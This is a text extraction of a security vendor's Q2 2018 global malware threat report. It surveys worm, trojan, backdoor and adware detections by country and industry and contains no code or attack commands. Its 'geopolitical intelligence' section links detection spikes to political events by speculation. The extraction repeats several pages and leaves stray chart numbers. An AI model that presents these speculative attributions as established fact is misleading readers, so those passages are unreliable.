This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
